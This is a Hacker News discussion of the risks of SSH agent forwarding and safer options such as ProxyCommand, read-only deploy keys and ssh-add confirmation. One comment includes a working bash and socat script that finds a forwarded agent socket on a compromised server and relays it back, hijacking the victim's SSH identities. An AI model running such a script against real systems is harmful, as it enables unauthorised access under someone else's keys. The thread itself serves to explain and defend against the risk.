SSH Agent Forwarding considered harmful (heipei.github.io)
67 points by nodata 760 days ago | 46 comments



It says so right in the man page:

"Agent forwarding should be enabled with caution. Users with the ability to bypass file permissions on the remote host (for the agent's UNIX-domain socket) can access the local agent through the forwarded connection. An attacker cannot obtain key material from the agent, however they can perform operations on the keys that enable them to authenticate using the identities loaded into the agent."

And it's not like this is buried in the manual. It says this in the section describing `-A`.


So true. But then again, judging by the number of comments this got both here and on Reddit, it seems a lot of people were either not aware of the danger or, even if aware, had not found a suitable replacement (such as ProxyCommand).


Indeed. This is far from being news and has been properly documented for many years.

I'm amazed that people read far enough into the man pages to understand what agent forwarding does and how to enable it, but stop reading before they reach these warnings.


One legitimate use case for agent forwarding that I've used in the past is ssh-ing into a development server and doing a pull from a github repo. Without agent forwarding to authenticate from the dev server to github, that gets really annoying really fast. Whatever vulnerabilities are introduced by agent forwarding, they pale in comparison to those you get by leaving your private key on the dev server.


You can use read-only keys. Github has this, as do most other similar solutions.
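
A minimal sketch of that approach (the key filename and config entry here are illustrative, not prescriptive):

    # on the dev server: generate a dedicated key used only for pulls
    ssh-keygen -t ed25519 -f ~/.ssh/dev_pull_key -C "dev server, read-only"
    # register dev_pull_key.pub as a read-only key with your Git host, then
    # point ssh at it for that host in ~/.ssh/config:
    #   Host github.com
    #       IdentityFile ~/.ssh/dev_pull_key

If that key leaks, an attacker can read the repo but can't push to it or touch anything else.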

> Whatever vulnerabilities are introduced by agent forwarding they pale in comparison to those you get by leaving your private key on the dev server.

Not really. "pale in comparison" is way off. Leaving the key on the server, and using agent forwarding are almost the same: anyone with access to the server has access to the key. There's only a minor difference in how hard it is for the attacker to get the key.


An alternative would be to create an independent key (I forget what Github calls them) that has read-only permissions to access your repo.


I didn't realize this when I first started using them, but Github's deploy keys are read/write as of the last time I tried them, with no option to make them read-only.

I actually used Bitbucket for a while because their repo-level keys are read-only.


This is only legitimate if you consider designing a system that requires this to be legitimate.

A simpler solution:

1) Use a "real" deployment mechanism, not an authenticated git pull from Github.

2) Write software to be easy to deploy. If you require a ton of external fiddly work to get the code running, that's what necessitates the use of a shared development server.


The whole point of deploying via a git pull is so that you don't have to do "a ton of external fiddly work" to get the code running. By deploying via a git pull I ensure that the files in the data center are exactly the same as the files on the laptop where I wrote the code, so if it worked on my laptop it is very likely to work in the data center.


Why can't you just authenticate to github with your password when you pull from the dev server?


Because then you are exposing your password to a potentially untrusted dev server? Unless you are making a new password for that server, in which case you are still better off giving each server its own private key and registering the corresponding public keys for read-only access in your remote repo.

Another option: mount the corresponding directory of the dev server using sshfs, run git commands locally, and run everything else remotely. Although I am not sure whether there are any risks in mounting an untrusted directory via sshfs.
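
Something like this, for example (hostname and paths are illustrative):

    # mount the dev server's checkout locally over ssh
    mkdir -p ~/mnt/devrepo
    sshfs devserver:/home/me/repo ~/mnt/devrepo
    # run git locally; credentials never leave this machine
    cd ~/mnt/devrepo && git pull
    # unmount when done
    fusermount -u ~/mnt/devrepo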



The point of ProxyCommand is that you don't have to leave your private key on the server.


Yes, obviously, but ProxyCommand won't work for this use case (AFAICT). I don't need to ssh from my home machine through my devhost to github, I need to execute a git command on devhost that authenticates to github.


It can be password protected, though.


Yes, but then if I have to update 100 devhosts I have to type my password 100 times.


This could be automated. For example, both Ansible and Fabric allow you to enter your sudo password once (per run), and then it will enter it into the sudo prompt for you when executing remote commands. The same thing could be worked out for this (though I agree that it's a less flexible solution).


How is sudo supposed to help? I'm not trying to do anything that requires privileges on my machine, I'm trying to authenticate to github.


It's the same method. It uses something like expect to scrape the output of the commands, and determine that it needs to enter a password. That framework could be extended to do the same thing for git/ssh prompts on the remote machine. These tools don't currently do this, but I was just stating that it would be possible to enter the password once even when running this across multiple machines. Note that I'm not necessarily encouraging that as a solution.

For example, I know that one of them (probably Fabric) defines the sudo prompt (via the -p flag or SUDO_PROMPT environment variable) to be able to pick out a sudo prompt in the text output of the command, so that it knows it needs to respond with the password.


The problem with that is that then to automate it you need the password in cleartext in memory. A core dump, ptrace, or anything like that and you've just given up all access.


Something I cooked up a while ago:

    #!/bin/bash
    # Reverse-forward a remote user's forwarded ssh-agent back to this machine.
    REMOTE_HOST=$1
    # Scrape /proc on the remote host for a process environment (owned by our
    # user) containing SSH_AUTH_SOCK, i.e. the socket of a forwarded agent.
    REMOTE_SSH_AUTH_SOCK=`ssh $REMOTE_HOST 'find /proc -maxdepth 2 -user \$USER -wholename */environ 2>/dev/null | xargs grep -zhm1 SSH_AUTH_SOCK 2>/dev/null' | tr '\0' '\n' | head -n1 | cut -d = -f 2`
    if [ -n "$REMOTE_SSH_AUTH_SOCK" ]
        then
            echo Found remote agent socket $REMOTE_SSH_AUTH_SOCK
            # Listen on a local socket and relay it, via ssh + socat,
            # to the agent socket we just found on the remote host.
            HIJACKED_SSH_AUTH_SOCK=/dev/shm/agentjack_$REMOTE_HOST
            socat UNIX-LISTEN:$HIJACKED_SSH_AUTH_SOCK,reuseaddr,fork EXEC:"'ssh -q $1 socat STDIO UNIX-CONNECT:$REMOTE_SSH_AUTH_SOCK'" &
            SOCAT_PID=$!
            # Spawn a shell whose SSH_AUTH_SOCK points at the relay; ssh
            # commands run in it authenticate with the hijacked agent.
            export SSH_AUTH_SOCK=$HIJACKED_SSH_AUTH_SOCK
            bash
            kill $SOCAT_PID
    fi

This will connect to a server that you have somehow gained access to, find an agent socket, and reverse-forward the agent to the system you're connecting from. Depends on socat being installed on the server, though, which is somewhat uncommon.

I wrote a tool a while ago that automates using ssh jump hosts, which may be of interest: https://github.com/ryancdotorg/ssh-chain


I also put together a reverse agent a few years ago: https://github.com/ewindisch/reverse-ssh-agent


Agent forwarding and ProxyCommand-style jumps address two different use cases; each has uses the other cannot serve.

ProxyCommand is used for 'jump servers', where you simply want to log in to one server via another. It's handy to authenticate from your desktop to the far server whenever possible and not leave yourself open to attack from some server in the middle. In fact, an ssh agent becomes very handy in combination with ProxyCommand-style jumps.

Agent forwarding is used when you actually need different servers to interact with each other [and not your desktop] using credentials only you control. Rather than keeping credentials on the disks of intermediate servers, they stay on your desktop.

From an even more practical standpoint, agents allow you to copy files between servers without stored credentials, too. Just try copying a couple of terabytes of data from one server to another with your cable modem as the intermediary; it takes a lot longer than copying from server to server. Hence agent forwarding, which lets you copy files from host A to host B using the creds on your desktop. ProxyCommand doesn't do this.
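
For instance, a direct server-to-server copy with a forwarded agent looks something like this (hostnames are illustrative):

    # from the desktop: forward the agent to hosta
    ssh -A hosta
    # now on hosta: copy straight to hostb, authenticating via the forwarded
    # agent -- the data flows hosta -> hostb, never through the desktop
    scp /data/bigfile.tar hostb:/data/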

Agent forwarding is always potentially harmful, but that potential can be limited a great deal. Of course, neither the private keys nor passwords are ever sent over the network. ssh-add -c allows you to be prompted before they're used (the author thought it was ssh-agent's option), and the -t option to both ssh-agent and ssh-add allows you to expire the credentials after a given period of time.
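
For example (key path illustrative):

    # require confirmation (via ssh-askpass) every time the key is used
    ssh-add -c ~/.ssh/id_rsa
    # or make the agent forget the key after an hour
    ssh-add -t 3600 ~/.ssh/id_rsa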


How is ProxyCommand any better?

You still have to authenticate on the far remote server somehow, and the root user of the compromised middle machine can still MITM your entire negotiation because you have to trust their sshd and ssh commands.

How do you know they're not just rewriting your ProxyCommand?...


It's called secure shell for a reason. You know your ProxyCommand isn't tampered with because your ssh client has successfully matched the remote system key against your known_hosts file.


Looks like I slightly misunderstood how the command functioned, what with proxying the traffic back to your local ssh client.

I thought it was more like `ssh hosta 'ssh hostb'`, which would be problematic, but that's not the case. Phew.

So while non-secure protocols through ProxyCommand could still get MITM'd if they own hostA's sshd, proxying ssh itself would be fine, assuming you already had fingerprints. Much less worrisome. :)


Yeah, exactly, only your machine and the endpoint have to be secure for your application to be secure. I frequently run something like plain HTTP, netcat and other stuff over a ProxyCommand-initiated session.


Um, you realize that you're still relying on the mid-point SSHD to relay TCP packets without MITMing you though, right?

The only reason tunneling SSH through a ProxyCommand is safe is that your local SSH does the authentication, so you would get the freaky "WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!" warning (via known_hosts).

Netcat and plain HTTP don't have an authentication layer, so if your proxy server is compromised, so is your plain traffic.

EDIT: see this other reply for another source: https://news.ycombinator.com/item?id=9428518


ProxyCommand is a command that runs locally on the system you're connecting from. The only thing the potentially compromised middle machine is doing is forwarding a TCP connection.


Thanks, that explained my confusion. :)


Nothing new here; what's more amazing is how apparently unknown this is. Also, there are risks the article doesn't acknowledge:

1) You should fear for your key just as much from local applications as from a remote machine. Yes, there is a great risk from remote systems and agent forwarding, but do not become overly comfortable and presume these best practices do not also extend to your local machine.

2) You should always require ssh-askpass. You want to be prompted locally; otherwise, malicious software on your machine could compromise your keyring. Needless to say, encrypt your key (have a passphrase).

3) You want to use 'ssh-add -x' to lock your keyring and prevent removal or addition of keys. Not only could leaving it unlocked open you to various direct attacks, but ssh-agent itself could be a target for attack via buffer overflow, double-free, etc. One trivial attack made possible by not using 'ssh-add -x' would be to flood the agent with keys, forcing logins to fail with too-many-attempts errors.
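
For example:

    # lock the agent with a password; key use and add/remove requests
    # are refused until it is unlocked again
    ssh-add -x
    # unlock it later
    ssh-add -X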


The last paragraph about eavesdropping is interesting. The agent doesn't actually give out your key, so an attacker can't use your key to decrypt any traffic. Instead, the attacker gets at the decrypted data as it passes between two ssh processes. Agent forwarding requires the data to be decrypted on the compromised proxy machine. That's the security hole.

The data is encrypted between the workstation and the proxy machine A, which we'll assume is compromised. The receiving ssh process running on machine A decrypts the data and gives it to a second ssh process, which re-encrypts it and sends it to the destination machine B. Because it's getting decrypted on machine A, anybody who controls that machine can view or modify the data.

With a proxy command, there is only one ssh process running on the compromised machine and it never sees the decrypted data. All it's doing is forwarding a TCP connection. The second ssh process (the one connected to B) runs on your workstation. The data is encrypted on your workstation and sent to B, via the TCP tunnel running on A. But the data passing through A is encrypted using ephemeral keys that A doesn't have. In this situation, controlling A is no more useful than controlling any of the other internet routers or switches that your data is passing through.
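
Concretely, the difference is where the second ssh process runs. With a ProxyCommand like the following (hostnames illustrative), both ssh processes run on your workstation and A only ever relays an opaque TCP stream:

    # the session to B is encrypted end-to-end on the workstation;
    # A just forwards packets it cannot read
    ssh -o ProxyCommand='ssh -W %h:%p userA@hostA' userB@hostB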


A legitimate use case for forwarding your SSH agent is when you're working with a bunch of local VMs. I spin up several vagrant boxes that connect to different networks, and like to be able to log in to the VMs and have ssh-agent continue to let me do passwordless login to remote machines.

I suppose you could use ProxyCommand for stuff like this, but it interferes with the vagrant ssh syntax, and makes you go through the hassle of updating your SSH config, which doesn't scale very well.
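
(For reference, Vagrant exposes this as a per-machine setting; a minimal sketch, with the box name being illustrative:)

    # Vagrantfile: forward the host's ssh-agent into the VM
    Vagrant.configure("2") do |config|
      config.vm.box = "ubuntu/trusty64"
      config.ssh.forward_agent = true
    end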


Author here: Yes, that is one use-case I also consider in the post when I talk about using SSH Agent Forwarding into Linux namespaces. The same argument can be made about VMs, if you place the same trust in them as you do in your desktop.


A fun read in a similar vein: the mosh (https://mosh.mit.edu/) issue regarding adding support for SSH agent forwarding: https://github.com/keithw/mosh/issues/120


I see a lot of people demanding that mosh add a security hole because they don't know the secure way of doing what they want to do. (It's also quite possible that I'm just misunderstanding the whole thing.)

But it's pretty easy to see where the real problem is. I recently spent a few days trying to figure out how I could configure SSH to connect to one machine via a different machine. (This effort was a total failure.) I read the ssh_config man page. Here's the entry for ProxyCommand, which is apparently how you do this:

    ProxyCommand
      Specifies the command to use to connect to the server.  The
      command string extends to the end of the line, and is executed
      using the user's shell `exec' directive to avoid a lingering
      shell process.

      In the command string, any occurrence of `%h' will be substituted
      by the host name to connect, `%p' by the port, and `%r' by the
      remote user name.  The command can be basically anything, and
      should read from its standard input and write to its standard
      output.  It should eventually connect an sshd(8) server running
      on some machine, or execute sshd -i somewhere.  Host key
      management will be done using the HostName of the host being
      connected (defaulting to the name typed by the user).  Setting
      the command to ``none'' disables this option entirely.  Note that
      CheckHostIP is not available for connects with a proxy command.

      This directive is useful in conjunction with nc(1) and its proxy
      support.  For example, the following directive would connect via
      an HTTP proxy at 192.0.2.0:

         ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

I think it's fair to say that this is completely incomprehensible. I've read it several times; I still can't say I understand any part of it (all right, I understand the bit about %h, %p, and %r substitutions). It doesn't surprise me at all that nobody uses ProxyCommand -- how are they supposed to know what it does, or how it's used?

I might also note that this "correct" solution involves telling ssh to execute the nc command on the middle machine, which is a weird bit of arcana to add to the process and makes it much harder to intuit independently. Ideally, I'd hope for a solution that lets me just supply credentials and information for the middle machine, and let ssh sort out how to get through it.
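
(For what it's worth, newer OpenSSH makes the middle-machine nc unnecessary: the -W flag, and later the -J/ProxyJump shorthand, keep everything inside ssh itself. Hostnames here are illustrative:)

    # tunnel to target through middle, no nc needed on the middle machine
    ssh -o ProxyCommand='ssh -W %h:%p middle' target
    # OpenSSH 7.3 and later shorten this to
    ssh -J middle target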


It occurs to me that all this would be much simpler/more elegant if ssh wasn't trying to be a dumb pipe, but instead something more like "tmux where some sessions can be remote".

* Both servers and clients would have an "SSH session-manager daemon" running.

* New terminals would preferably invoke just "ssh" as their shell, which would create a connection to the local SSH session-manager server—the same way people tend to use tmux under desktop Linux.

* The ssh(1) command would be able to talk to the session control channel of whatever session it's being run in, and say things like "hey SSH client, make a new session connected to this remote!" (Again like tmux.)

* The remote side would be running an SSH session-manager daemon too, so when you are in a session connected to hostA and you type "ssh hostB", the remote session manager daemon of hostA would set up a TCP-forwarding channel within itself, provide the new channel's ID over the control-channel back to the connected client, and the connected client would then create a new session connected to the TCP-forwarding channel.

Actually, now that I think about it, this is pretty much exactly like using Erlang's job control with remsh connections.


I appreciate SSH's ability to work as a dumb pipe. Tunnels are a boon to my life.

What I really, really want is for the SSH documentation to make sense even to people who don't already know what it means. If I know what I want to do, and SSH provides a way of doing that exact thing, I don't think it's too much to ask for the documentation to be good enough that I recognize the thing I want when I read about it. As things currently stand, the ProxyCommand documentation is only helpful at all if you already know all about ProxyCommand.


You could have both. Just like there's both ssh(1) and scp(1), you could have snc (heck, that probably already exists.)

But I don't see why SSH itself has to be constrained by being both a dumb pipe and a client/server shell system. Shells are complicated things, remote shells even moreso, and requiring them to also be able to serve as dumb pipes constrains the way you implement the shell stuff—it pokes a hole in the abstraction.

(If it were all up to me way back when, I'd have just cleaned up the TTY-device abstraction, merged it with PTYs and serial consoles, made the whole thing socket-routable at the kernel level... and then pushed IPSec to ship with a very SSH-like auto-negotiated pairing protocol. We have the worst of a lot of worlds.)


You're right. This is a good idea.


The particularly annoying part is that nc or socat or whatever is not required in any relatively modern ssh.

My .ssh/config for use with a bastion or jump host:

  Host *.prod.blah.com
    ForwardAgent yes
    ProxyCommand ssh -W %h:%p %r@jumphost.ext.blah.com
 
  Host *.ext.blah.com
    ForwardAgent yes
It's all do-able within ssh-land. I do forward my agent, but only to hosts in my production sub-domains rather than to anyone I connect to. It could get hijacked, but at least the attack vector is a lot smaller.


ProxyCommand is simpler to set up if you have a new enough ssh that -W is available. You can do "ProxyCommand ssh gateway -W real_host:22" to go directly to real_host.


> keeping track of which keys have been added to your local ssh-agent is a tedious task. SSH is very promiscuous when it comes to using SSH keys, and once you make use of another key it will happily add that to your current agent session.

I've only found this to be true with gnome-keyring's ssh-agent emulation (which isn't complete last time I checked, since it doesn't support -c) and the ssh-agent that OSX's keychain provides. They implicitly add keys with known filenames in ~/.ssh (id_rsa, for example) and show them in the output of `ssh-add -l`. To make matters worse, decrypting the key file puts the passphrase in the keychain, so even if you put a passphrase on your ssh key, it's still accessible after you log in and authenticate to the keychain service.

The ssh-agent that is distributed with openssh does not do this and requires keys to be added explicitly.
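
With stock OpenSSH, for example, the agent starts empty and only ever holds what you hand it:

    ssh-add -l                # "The agent has no identities."
    ssh-add ~/.ssh/id_rsa     # added explicitly (add -c to require confirmation)
    ssh-add -l                # now lists that key's fingerprint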


Are people only just realising this?

I would only ever use agent forwarding to a trusted host, exactly because of what it does: put a socket on that host that answers authentication challenges with your SSH key. Anyone on that host with root can use your key.


"This is like having unprotected sex only for a short amount of time. And sometimes you do"


Why not just require key-use confirmation with `ssh-add -c`? It's that easy.



